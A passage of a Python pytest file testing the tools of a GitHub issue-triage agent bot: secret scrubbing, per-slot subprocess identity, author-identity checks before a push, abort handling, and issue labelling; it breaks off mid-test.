_make_loop_in_background() + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=_stub_issue(), + workspace=_stub_workspace(tmp_path), + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + slot_uid=slot_uid, + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=bindings.workspace.branch, + session_dir=str(bindings.workspace.session_dir), + ) + return bindings, loop, thread + + +def _ctx() -> HostToolContext[Any]: + return HostToolContext(tool_call_id="tc-1", _cancel_event=threading.Event(), _send_update=lambda _payload: None) + + +def test_repo_command_env_scrubs_secrets_and_uses_workspace_cache( + db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + monkeypatch.setenv("GITHUB_TOKEN", "secret-token") + monkeypatch.setenv("GITHUB_WEBHOOK_SECRET", "secret-webhook") + monkeypatch.setenv("ROBOMP_GH_PROXY_HMAC_KEY", "secret-proxy") + monkeypatch.setenv("BUN_INSTALL_CACHE_DIR", "/data/cache/bun-cache") + + bindings, loop, thread = _bindings(db, tmp_path, httpx.MockTransport(lambda _r: httpx.Response(500)), slot_uid=2001) + try: + env = host_tools._repo_command_env(bindings) + finally: + _stop_loop(loop, thread) + + assert env["GITHUB_TOKEN"] == "" + assert env["GITHUB_WEBHOOK_SECRET"] == "" + assert env["ROBOMP_GH_PROXY_HMAC_KEY"] == "" + assert env["BUN_INSTALL_CACHE_DIR"] == str(bindings.workspace.root / ".omp-xdg" / "cache" / "bun-install") + assert env["XDG_CACHE_HOME"] == str(bindings.workspace.root / ".omp-xdg" / "cache") + assert env["TMPDIR"] == str(bindings.workspace.root / ".omp-tmp") + assert env["GIT_CONFIG_COUNT"] == "1" + assert env["GIT_CONFIG_KEY_0"] == "safe.directory" + assert env["GIT_CONFIG_VALUE_0"] == str(bindings.workspace.repo_dir) + assert env["GIT_AUTHOR_NAME"] == bindings.author_name + assert env["GIT_AUTHOR_EMAIL"] == bindings.author_email + assert env["GIT_COMMITTER_NAME"] == bindings.author_name + assert env["GIT_COMMITTER_EMAIL"] == bindings.author_email + assert (bindings.workspace.root / ".omp-tmp").is_dir() + + +def test_run_repo_command_uses_slot_identity_kwargs( + db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + import subprocess + + bindings, loop, thread = _bindings(db, tmp_path, httpx.MockTransport(lambda _r: httpx.Response(500)), slot_uid=2001) + captured: dict[str, Any] = {} + + monkeypatch.setattr( + host_tools, + "_slot_subprocess_kwargs", + lambda uid: {"user": uid, "group": uid, "extra_groups": [2000], "umask": 0o002}, + ) + + def fake_run(cmd: list[str], **kwargs: Any) -> subprocess.CompletedProcess[str]: + captured["cmd"] = cmd + captured["kwargs"] = kwargs + return subprocess.CompletedProcess(cmd, 0, "ok", "") + + monkeypatch.setattr(host_tools.subprocess, "run", fake_run) # type: ignore[attr-defined] + try: + proc = host_tools._run_repo_command(bindings, ["git", "status"]) + finally: + _stop_loop(loop, thread) + + assert proc.stdout == "ok" + assert captured["cmd"] == ["git", "status"] + kwargs = captured["kwargs"] + assert kwargs["cwd"] == str(bindings.workspace.repo_dir) + assert kwargs["user"] == 2001 + assert kwargs["group"] == 2001 + assert kwargs["extra_groups"] == [2000] + assert kwargs["umask"] == 0o002 + assert kwargs["env"]["BUN_INSTALL_CACHE_DIR"].endswith("/.omp-xdg/cache/bun-install") + + +def test_guarded_push_branch_rev_parse_runs_via_repo_command_and_passes_slot_uid( + db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + import subprocess + from dataclasses import replace + + from robomp.git_ops import PushResult + + class RecordingTransport: + def __init__(self) -> None: + self.calls: list[dict[str, Any]] = [] + + def push_branch(self, **kwargs: Any) -> PushResult: + self.calls.append(kwargs) + return PushResult(head=str(kwargs["expected_head"]), branch=str(kwargs["branch"])) + + transport = RecordingTransport() + bindings, loop, thread = _bindings( + db, + tmp_path, + httpx.MockTransport(lambda _r: httpx.Response(500)), + slot_uid=2001, + ) + bindings = replace(bindings, git_transport=transport) + commands: list[list[str]] = [] + + def fake_run_repo_command( + command_bindings: ToolBindings, cmd: list[str] | tuple[str, ...], *, timeout: float | None = None + ) -> subprocess.CompletedProcess[str]: + del timeout + assert command_bindings.slot_uid == 2001 + command = list(cmd) + commands.append(command) + if command == ["git", "rev-parse", "HEAD"]: + return subprocess.CompletedProcess(command, 0, "abc123\n", "") + if command[:3] == ["git", "log", "--format=%H%x09%ae%x09%an"]: + return subprocess.CompletedProcess( + command, + 0, + "abc123\trobomp-bot@example.invalid\trobomp-bot\n", + "", + ) + return subprocess.CompletedProcess(command, 0, "", "") + + monkeypatch.setattr(host_tools, "_run_repo_command", fake_run_repo_command) + monkeypatch.setattr(host_tools, "_share_git_metadata_with_slots", lambda _repo_dir, _slot_uid: None) + try: + head = host_tools._guarded_push_branch(bindings, {}, "gh_push_branch", bindings.workspace.branch) + finally: + _stop_loop(loop, thread) + + assert head == "abc123" + assert ["git", "rev-parse", "HEAD"] in commands + assert transport.calls == [ + { + "repo": "octo/widget", + "workspace_key": "octo__widget__42", + "repo_dir": bindings.workspace.repo_dir, + "branch": bindings.workspace.branch, + "expected_head": "abc123", + "slot_uid": 2001, + } + ] + + +def test_gh_post_comment_happy_path(db: Database, tmp_path: Path) -> None: + captured: dict[str, Any] = {} + + def handler(request: httpx.Request) -> httpx.Response: + captured["url"] = str(request.url) + captured["body"] = json.loads(request.content) + captured["auth"] = request.headers.get("authorization") + return httpx.Response(201, json={"id": 999, "user": {"login": "robomp-bot"}, "body": "hi", "created_at": "t"}) + + transport = httpx.MockTransport(handler) + bindings, loop, t = _bindings(db, tmp_path, transport) + try: + tool = next(x for x in build(bindings) if x.name == "gh_post_comment") + result = tool.execute({"body": "hi"}, _ctx()) + finally: + _stop_loop(loop, t) + + assert result.startswith("comment posted") + assert captured["url"].endswith("/repos/octo/widget/issues/42/comments") + assert captured["body"] == {"body": "hi"} + assert captured["auth"] == "Bearer token" + + +def test_gh_post_comment_validates_body(db: Database, tmp_path: Path) -> None: + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(lambda r: httpx.Response(500))) + try: + tool = next(x for x in build(bindings) if x.name == "gh_post_comment") + with pytest.raises(RpcCommandError): + tool.execute({"body": ""}, _ctx()) + finally: + _stop_loop(loop, t) + + +def test_gh_post_comment_defaults_to_inbound_pr_thread(db: Database, tmp_path: Path) -> None: + """PR conversation/review tasks set inbound_thread_number to the PR; the + agent's reply must land on that PR by default, not the originating issue.""" + captured: dict[str, Any] = {} + + def handler(request: httpx.Request) -> httpx.Response: + captured["url"] = str(request.url) + return httpx.Response(201, json={"id": 7, "user": {"login": "robomp-bot"}, "body": "hi", "created_at": "t"}) + + transport = httpx.MockTransport(handler) + github = GitHubClient("token", transport=transport) + loop, thread = _make_loop_in_background() + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=_stub_issue(), # issue #42 + workspace=_stub_workspace(tmp_path), + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + inbound_thread_number=99, # PR #99 that fixes issue #42 + ) + try: + tool = next(x for x in build(bindings) if x.name == "gh_post_comment") + tool.execute({"body": "hi"}, _ctx()) + finally: + _stop_loop(loop, thread) + + assert captured["url"].endswith("/repos/octo/widget/issues/99/comments"), captured["url"] + + +def test_gh_post_comment_explicit_number_overrides_inbound(db: Database, tmp_path: Path) -> None: + """An explicit `number` arg still wins over the inbound default.""" + captured: dict[str, Any] = {} + + def handler(request: httpx.Request) -> httpx.Response: + captured["url"] = str(request.url) + return httpx.Response(201, json={"id": 7, "user": {"login": "robomp-bot"}, "body": "hi", "created_at": "t"}) + + transport = httpx.MockTransport(handler) + github = GitHubClient("token", transport=transport) + loop, thread = _make_loop_in_background() + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=_stub_issue(), + workspace=_stub_workspace(tmp_path), + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + inbound_thread_number=99, + ) + try: + tool = next(x for x in build(bindings) if x.name == "gh_post_comment") + tool.execute({"body": "hi", "number": 42}, _ctx()) + finally: + _stop_loop(loop, thread) + + assert captured["url"].endswith("/repos/octo/widget/issues/42/comments"), captured["url"] + + +def test_gh_post_comment_propagates_github_error(db: Database, tmp_path: Path) -> None: + transport = httpx.MockTransport(lambda r: httpx.Response(422, json={"message": "Validation failed"})) + bindings, loop, t = _bindings(db, tmp_path, transport) + try: + tool = next(x for x in build(bindings) if x.name == "gh_post_comment") + with pytest.raises(RpcCommandError) as exc: + tool.execute({"body": "hi"}, _ctx()) + assert "422" in str(exc.value) + finally: + _stop_loop(loop, t) + + +def test_gh_open_pr_requires_template_sections(db: Database, tmp_path: Path) -> None: + transport = httpx.MockTransport(lambda r: httpx.Response(500)) + bindings, loop, t = _bindings(db, tmp_path, transport) + try: + tool = next(x for x in build(bindings) if x.name == "gh_open_pr") + with pytest.raises(RpcCommandError) as exc: + tool.execute({"title": "t", "body": "no sections"}, _ctx()) + assert "Repro" in str(exc.value) + finally: + _stop_loop(loop, t) + + +def test_repro_record_writes_transcript(db: Database, tmp_path: Path) -> None: + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(lambda r: httpx.Response(500))) + try: + tool = next(x for x in build(bindings) if x.name == "repro_record") + result = tool.execute( + { + "title": "panic on empty input", + "command": "bun test foo.test.ts", + "output": "Error: boom", + "exit_code": 1, + "reproduced": True, + }, + _ctx(), + ) + assert result == "recorded" + files = list(bindings.workspace.repro_dir.iterdir()) + assert len(files) == 1 + assert "exit_code: 1" in files[0].read_text() + finally: + _stop_loop(loop, t) + + +def test_repro_record_chowns_to_slot_when_root(db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + chowns: list[tuple[Path, int, int]] = [] + monkeypatch.setattr(host_tools, "_slot_permissions_active", lambda slot_uid: slot_uid is not None) + monkeypatch.setattr("robomp.host_tools.os.chown", lambda path, uid, gid: chowns.append((Path(path), uid, gid))) + + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(lambda r: httpx.Response(500)), slot_uid=2001) + try: + tool = next(x for x in build(bindings) if x.name == "repro_record") + result = tool.execute( + { + "title": "panic on empty input", + "command": "bun test foo.test.ts", + "output": "Error: boom", + "exit_code": 1, + }, + _ctx(), + ) + assert result == "recorded" + files = list(bindings.workspace.repro_dir.iterdir()) + assert len(files) == 1 + assert chowns == [(files[0], 2001, 2001)] + finally: + _stop_loop(loop, t) + + +def test_repro_record_rejects_bad_args(db: Database, tmp_path: Path) -> None: + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(lambda r: httpx.Response(500))) + try: + tool = next(x for x in build(bindings) if x.name == "repro_record") + with pytest.raises(RpcCommandError): + tool.execute({"title": "", "command": "x", "output": "y", "exit_code": 1}, _ctx()) + with pytest.raises(RpcCommandError): + tool.execute({"title": "t", "command": "x", "output": "y", "exit_code": "bad"}, _ctx()) + finally: + _stop_loop(loop, t) + + +def test_mark_unable_posts_comment_and_abandons(db: Database, tmp_path: Path) -> None: + captured: dict[str, Any] = {} + + def handler(request: httpx.Request) -> httpx.Response: + captured["body"] = json.loads(request.content) + return httpx.Response(201, json={"id": 77, "user": {"login": "robomp-bot"}, "body": "x", "created_at": "t"}) + + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(handler)) + try: + tool = next(x for x in build(bindings) if x.name == "mark_unable_to_reproduce") + result = tool.execute({"diagnosis": "needed exact version", "info_needed": "post bun --version"}, _ctx()) + finally: + _stop_loop(loop, t) + assert "abandonment" in result + assert "Could not reproduce" in captured["body"]["body"] + issue = db.get_issue(bindings.issue_key) + assert issue and issue.state == "abandoned" + + +def test_abort_task_signals_controller_and_abandons_without_comment(db: Database, tmp_path: Path) -> None: + # Any HTTP call is a regression: abort_task MUST NOT touch GitHub. + def handler(request: httpx.Request) -> httpx.Response: + raise AssertionError(f"abort_task issued an HTTP request to {request.url}") + + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(handler)) + controller = AbortController() + stops: list[None] = [] + controller.stop = lambda: stops.append(None) + # Frozen dataclass — rebuild with the controller attached. + bindings = ToolBindings( + db=bindings.db, + github=bindings.github, + git_transport=bindings.git_transport, + repo=bindings.repo, + issue=bindings.issue, + workspace=bindings.workspace, + loop=bindings.loop, + author_name=bindings.author_name, + author_email=bindings.author_email, + settings=bindings.settings, + inbound_thread_number=bindings.inbound_thread_number, + inbound_is_pr=bindings.inbound_is_pr, + slot_uid=bindings.slot_uid, + abort=controller, + ) + try: + tool = next(x for x in build(bindings) if x.name == "abort_task") + result = tool.execute({"reason": "ref dir owned by foreign uid; git commit cannot lock HEAD"}, _ctx()) + finally: + _stop_loop(loop, t) + assert result == "aborted" + assert controller.triggered + assert "foreign uid" in controller.reason + assert len(stops) == 1, "stop callback must fire exactly once" + issue = db.get_issue(bindings.issue_key) + assert issue and issue.state == "abandoned" + # Audit row records the call. Use raw SQL because `Database` exposes a + # writer but no reader for `tool_calls` — the dashboard reads via SQL too. + with db._lock: # noqa: SLF001 - test-only inspection + row = db._conn.execute( # noqa: SLF001 + "SELECT tool, args_json FROM tool_calls WHERE issue_key=? AND tool=?", + (bindings.issue_key, "abort_task"), + ).fetchone() + assert row is not None + assert "foreign uid" in row["args_json"] + + +def test_abort_task_rejects_empty_reason(db: Database, tmp_path: Path) -> None: + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(lambda r: httpx.Response(500))) + try: + tool = next(x for x in build(bindings) if x.name == "abort_task") + with pytest.raises(RpcCommandError): + tool.execute({"reason": " "}, _ctx()) + finally: + _stop_loop(loop, t) + # No state change on rejected validation. + issue = db.get_issue(bindings.issue_key) + assert issue and issue.state == "reproducing" + + +def test_abort_task_signal_is_idempotent(db: Database, tmp_path: Path) -> None: + controller = AbortController() + fires: list[None] = [] + controller.stop = lambda: fires.append(None) + controller.signal("first") + controller.signal("second") + assert controller.triggered + assert controller.reason == "first" # second call must not overwrite + assert len(fires) == 1, "stop must not be called again after the first abort" + + +def test_fetch_issue_thread_returns_markdown(db: Database, tmp_path: Path) -> None: + def handler(request: httpx.Request) -> httpx.Response: + if request.url.path.endswith("/comments"): + return httpx.Response( + 200, + json=[ + {"id": 1, "user": {"login": "alice"}, "body": "still broken", "created_at": "t1"}, + ], + ) + return httpx.Response( + 200, + json={ + "number": 42, + "title": "boom", + "body": "b", + "state": "open", + "user": {"login": "alice"}, + "labels": [{"name": "bug"}], + }, + ) + + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(handler)) + try: + tool = next(x for x in build(bindings) if x.name == "fetch_issue_thread") + result = tool.execute({}, _ctx()) + finally: + _stop_loop(loop, t) + assert "octo/widget#42" in result + assert "@alice" in result + assert "still broken" in result + + +def test_classify_issue_applies_labels_and_persists_primary(db: Database, tmp_path: Path) -> None: + captured: dict[str, Any] = {} + + def handler(request: httpx.Request) -> httpx.Response: + captured["path"] = request.url.path + captured["body"] = json.loads(request.content) + return httpx.Response( + 200, + json=[{"name": n} for n in captured["body"]["labels"]], + ) + + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(handler)) + try: + tool = next(x for x in build(bindings) if x.name == "classify_issue") + result = tool.execute( + { + "primary": "bug", + "priority": "prio:p1", + "functional": ["tool", "agent"], + "provider": "provider:openai", + "platform": "platform:macos", + "rationale": "tool call panics on empty arg on macOS", + }, + _ctx(), + ) + finally: + _stop_loop(loop, t) + + assert "classified as bug" in result + assert "reproduce" in result.lower() + assert captured["path"].endswith("/issues/42/labels") + assert captured["body"]["labels"] == [ + "bug", + "prio:p1", + "tool", + "agent", + "providers", + "provider:openai", + "platform:macos", + "triaged", + ] + row = db.get_issue(bindings.issue_key) + assert row is not None and row.classification == "bug" + + +def test_classify_issue_question_skips_repro_path(db: Database, tmp_path: Path) -> None: + transport = httpx.MockTransport(lambda r: httpx.Response(200, json=[{"name": "question"}, {"name": "triaged"}])) + bindings, loop, t = _bindings(db, tmp_path, transport) + try: + tool = next(x for x in build(bindings) if x.name == "classify_issue") + result = tool.execute( + {"primary": "question", "rationale": "how-to about config"}, + _ctx(), + ) + finally: + _stop_loop(loop, t) + assert "question" in result + assert "no PR" in result + row = db.get_issue(bindings.issue_key) + assert row is not None and row.classification == "question" + + +def test_classify_issue_rejects_bug_without_priority(db: Database, tmp_path: Path) -> None: + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(lambda r: httpx.Response(500))) + try: + tool = next(x for x in build(bindings) if x.name == "classify_issue") + with pytest.raises(RpcCommandError): + tool.execute({"primary": "bug", "rationale": "yes a bug"}, _ctx()) + finally: + _stop_loop(loop, t) + + +def test_classify_issue_drops_priority_on_non_bug(db: Database, tmp_path: Path) -> None: + """Non-bug primaries silently drop a stray `priority` rather than rejecting. + + Some models treat every tool-schema property as required and would loop + forever if a non-empty optional value triggered a hard validation error. + """ + captured: dict[str, Any] = {} + + def handler(request: httpx.Request) -> httpx.Response: + captured["url"] = str(request.url) + captured["body"] = json.loads(request.content) + return httpx.Response(200, json=[{"name": "question"}, {"name": "triaged"}]) + + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(handler)) + try: + tool = next(x for x in build(bindings) if x.name == "classify_issue") + result = tool.execute( + {"primary": "question", "priority": "prio:p3", "rationale": "how-to"}, + _ctx(), + ) + finally: + _stop_loop(loop, t) + assert "question" in result + # priority must NOT be applied as a label on non-bug classifications. + assert "prio:p3" not in (captured["body"].get("labels") or []) + row = db.get_issue(bindings.issue_key) + assert row is not None and row.classification == "question" + + +def test_classify_issue_rejects_unknown_primary(db: Database, tmp_path: Path) -> None: + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(lambda r: httpx.Response(500))) + try: + tool = next(x for x in build(bindings) if x.name == "classify_issue") + with pytest.raises(RpcCommandError): + tool.execute({"primary": "nonsense", "rationale": "x"}, _ctx()) + finally: + _stop_loop(loop, t) + + +def _pr_bindings( + db: Database, tmp_path: Path, transport: httpx.MockTransport +) -> tuple[ToolBindings, asyncio.AbstractEventLoop, threading.Thread]: + """Same as _bindings but with `inbound_is_pr=True` — webhook arrived on a PR.""" + github = GitHubClient("token", transport=transport) + loop, thread = _make_loop_in_background() + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=_stub_issue(), + workspace=_stub_workspace(tmp_path), + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + inbound_thread_number=99, + inbound_is_pr=True, + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="opened", + branch=bindings.workspace.branch, + session_dir=str(bindings.workspace.session_dir), + pr_number=99, + ) + db.set_issue_classification(bindings.issue_key, "bug") + return bindings, loop, thread + + +def test_classify_issue_on_pr_thread_is_noop(db: Database, tmp_path: Path) -> None: + """On PR threads the tool must not hit GitHub and must not raise.""" + calls: list[str] = [] + + def handler(request: httpx.Request) -> httpx.Response: + calls.append(request.url.path) + return httpx.Response(500) + + bindings, loop, t = _pr_bindings(db, tmp_path, httpx.MockTransport(handler)) + try: + tool = next(x for x in build(bindings) if x.name == "classify_issue") + result = tool.execute( + {"primary": "documentation", "rationale": "docs only"}, + _ctx(), + ) + finally: + _stop_loop(loop, t) + assert "no-op" in result.lower() + assert calls == [] # no GitHub label mutation + # Classification must remain whatever it was before — not overwritten. + row = db.get_issue(bindings.issue_key) + assert row is not None and row.classification == "bug" + + +def test_classify_issue_already_classified_is_noop(db: Database, tmp_path: Path) -> None: + """Re-classifying an already-classified issue is rejected without GitHub side effects.""" + calls: list[str] = [] + + def handler(request: httpx.Request) -> httpx.Response: + calls.append(request.url.path) + return httpx.Response(500) + + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(handler)) + db.set_issue_classification(bindings.issue_key, "bug") + try: + tool = next(x for x in build(bindings) if x.name == "classify_issue") + result = tool.execute( + {"primary": "question", "rationale": "actually a question"}, + _ctx(), + ) + finally: + _stop_loop(loop, t) + assert "no-op" in result.lower() + assert "already classified" in result.lower() + assert calls == [] + row = db.get_issue(bindings.issue_key) + assert row is not None and row.classification == "bug" # unchanged + + +def test_set_issue_labels_on_pr_thread_is_noop(db: Database, tmp_path: Path) -> None: + calls: list[str] = [] + + def handler(request: httpx.Request) -> httpx.Response: + calls.append(request.url.path) + return httpx.Response(500) + + bindings, loop, t = _pr_bindings(db, tmp_path, httpx.MockTransport(handler)) + try: + tool = next(x for x in build(bindings) if x.name == "set_issue_labels") + result = tool.execute({"labels": ["wontfix"]}, _ctx()) + finally: + _stop_loop(loop, t) + assert "no-op" in result.lower() + assert calls == [] + + +def _init_git_repo(repo_dir: Path, branch: str) -> None: + """Initialize a minimal git repo at `repo_dir` with `branch` checked out.""" + import os as _os + import subprocess as _sp + + repo_dir.mkdir(parents=True, exist_ok=True) + _sp.run( + ["git", "init", f"--initial-branch={branch}", str(repo_dir)], + check=True, + capture_output=True, + text=True, + ) + (repo_dir / "README.md").write_text("hi\n", encoding="utf-8") + _sp.run(["git", "-C", str(repo_dir), "add", "."], check=True, capture_output=True, text=True) + _sp.run( + ["git", "commit", "-m", "init"], + cwd=str(repo_dir), + check=True, + capture_output=True, + text=True, + env=_os.environ + | { + "GIT_AUTHOR_NAME": "t", + "GIT_AUTHOR_EMAIL": "t@t", + "GIT_COMMITTER_NAME": "t", + "GIT_COMMITTER_EMAIL": "t@t", + }, + ) + + +def test_classify_issue_renames_branch_when_slug_provided(db: Database, tmp_path: Path) -> None: + bindings, loop, t = _bindings( + db, + tmp_path, + httpx.MockTransport( + lambda r: httpx.Response(200, json=[{"name": "bug"}, {"name": "prio:p1"}, {"name": "triaged"}]) + ), + ) + # The stub workspace's initial branch matches `_stub_workspace`. + _init_git_repo(bindings.workspace.repo_dir, bindings.workspace.branch) + try: + tool = next(x for x in build(bindings) if x.name == "classify_issue") + result = tool.execute( + { + "primary": "bug", + "priority": "prio:p1", + "rationale": "powershell env colon-var parsing on win is broken", + "branch_slug": "fix-windows-env-colon-vars", + }, + _ctx(), + ) + finally: + _stop_loop(loop, t) + + assert "branch renamed to" in result.lower() + assert bindings.workspace.branch == "farm/abc12345/fix-windows-env-colon-vars" + row = db.get_issue(bindings.issue_key) + assert row is not None and row.branch == "farm/abc12345/fix-windows-env-colon-vars" + import subprocess as _sp + + head = _sp.run( + ["git", "symbolic-ref", "HEAD"], + cwd=str(bindings.workspace.repo_dir), + check=True, + capture_output=True, + text=True, + ).stdout.strip() + assert head == "refs/heads/farm/abc12345/fix-windows-env-colon-vars" + + +def test_classify_issue_rejects_invalid_branch_slug(db: Database, tmp_path: Path) -> None: + """Bad slug is rejected BEFORE GitHub is contacted (no labels applied).""" + requests: list[str] = [] + + def handler(request: httpx.Request) -> httpx.Response: + requests.append(str(request.url)) + return httpx.Response(500) + + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(handler)) + try: + tool = next(x for x in build(bindings) if x.name == "classify_issue") + with pytest.raises(RpcCommandError): + tool.execute( + { + "primary": "bug", + "priority": "prio:p1", + "rationale": "x", + "branch_slug": "Has-Caps", + }, + _ctx(), + ) + finally: + _stop_loop(loop, t) + + assert requests == [] # no GitHub call attempted + # Branch unchanged; issue row unchanged. + assert bindings.workspace.branch == "farm/abc12345/some-issue" + + +def test_classify_issue_omitting_branch_slug_is_a_noop(db: Database, tmp_path: Path) -> None: + """Existing callers that don't pass branch_slug must keep the original branch.""" + bindings, loop, t = _bindings( + db, + tmp_path, + httpx.MockTransport(lambda r: httpx.Response(200, json=[{"name": "question"}, {"name": "triaged"}])), + ) + try: + tool = next(x for x in build(bindings) if x.name == "classify_issue") + result = tool.execute( + {"primary": "question", "rationale": "how-to"}, + _ctx(), + ) + finally: + _stop_loop(loop, t) + + assert "branch renamed" not in result.lower() + assert bindings.workspace.branch == "farm/abc12345/some-issue" + + +def test_set_issue_labels_appends(db: Database, tmp_path: Path) -> None: + captured: dict[str, Any] = {} + + def handler(request: httpx.Request) -> httpx.Response: + captured["body"] = json.loads(request.content) + return httpx.Response(200, json=[{"name": n} for n in captured["body"]["labels"]]) + + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(handler)) + try: + tool = next(x for x in build(bindings) if x.name == "set_issue_labels") + result = tool.execute({"labels": ["wontfix"]}, _ctx()) + finally: + _stop_loop(loop, t) + assert "wontfix" in result + assert captured["body"]["labels"] == ["wontfix"] + + +def test_set_issue_labels_rejects_empty(db: Database, tmp_path: Path) -> None: + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(lambda r: httpx.Response(500))) + try: + tool = next(x for x in build(bindings) if x.name == "set_issue_labels") + with pytest.raises(RpcCommandError): + tool.execute({"labels": []}, _ctx()) + with pytest.raises(RpcCommandError): + tool.execute({"labels": [" ", ""]}, _ctx()) + finally: + _stop_loop(loop, t) + + +def test_gh_push_branch_rejects_wrong_identity(db: Database, tmp_path: Path) -> None: + """Pre-push gate refuses to push commits authored by anyone other than the configured identity.""" + import os + import subprocess + + # Build a real local upstream + worktree so git operations actually work. + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "seed", + "GIT_AUTHOR_EMAIL": "seed@x", + "GIT_COMMITTER_NAME": "seed", + "GIT_COMMITTER_EMAIL": "seed@x", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / "README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + ["git", "-C", str(seed), "-c", "user.email=seed@x", "-c", "user.name=seed", "commit", "-m", "init"], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="identity test", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + # Commit with a different identity to provoke the gate. + bad_env = os.environ | { + "GIT_AUTHOR_NAME": "wrong", + "GIT_AUTHOR_EMAIL": "wrong@nope", + "GIT_COMMITTER_NAME": "wrong", + "GIT_COMMITTER_EMAIL": "wrong@nope", + } + (ws.repo_dir / "x.txt").write_text("hi\n") + subprocess.run(["git", "-C", str(ws.repo_dir), "add", "."], check=True, capture_output=True) + subprocess.run( + ["git", "-C", str(ws.repo_dir), "-c", "user.email=wrong@nope", "-c", "user.name=wrong", "commit", "-m", "bad"], + check=True, + capture_output=True, + env=bad_env, + ) + + github = GitHubClient("tok", transport=httpx.MockTransport(lambda r: httpx.Response(500))) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + tool = next(x for x in build(bindings) if x.name == "gh_push_branch") + with pytest.raises(RpcCommandError) as exc: + tool.execute({}, _ctx()) + msg = str(exc.value) + assert "identity mismatch" in msg + assert "wrong " in msg + assert "robomp-bot " in msg + # Branch must NOT have been pushed. + refs = subprocess.run( + ["git", "-C", str(bare), "for-each-ref", "--format=%(refname)"], + capture_output=True, + text=True, + check=True, + ) + assert not any(r.startswith("refs/heads/farm/") for r in refs.stdout.splitlines()), refs.stdout + finally: + _stop_loop(loop, thread) + + +def test_gh_open_pr_rejects_wrong_identity_before_push_or_pr(db: Database, tmp_path: Path) -> None: + """gh_open_pr uses the guarded push path before creating the pull request.""" + import os + import subprocess + + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "seed", + "GIT_AUTHOR_EMAIL": "seed@x", + "GIT_COMMITTER_NAME": "seed", + "GIT_COMMITTER_EMAIL": "seed@x", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / "README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + ["git", "-C", str(seed), "-c", "user.email=seed@x", "-c", "user.name=seed", "commit", "-m", "init"], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="identity test", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + bad_env = os.environ | { + "GIT_AUTHOR_NAME": "wrong", + "GIT_AUTHOR_EMAIL": "wrong@nope", + "GIT_COMMITTER_NAME": "wrong", + "GIT_COMMITTER_EMAIL": "wrong@nope", + } + (ws.repo_dir / "x.txt").write_text("hi\n") + subprocess.run(["git", "-C", str(ws.repo_dir), "add", "."], check=True, capture_output=True) + subprocess.run( + ["git", "-C", str(ws.repo_dir), "-c", "user.email=wrong@nope", "-c", 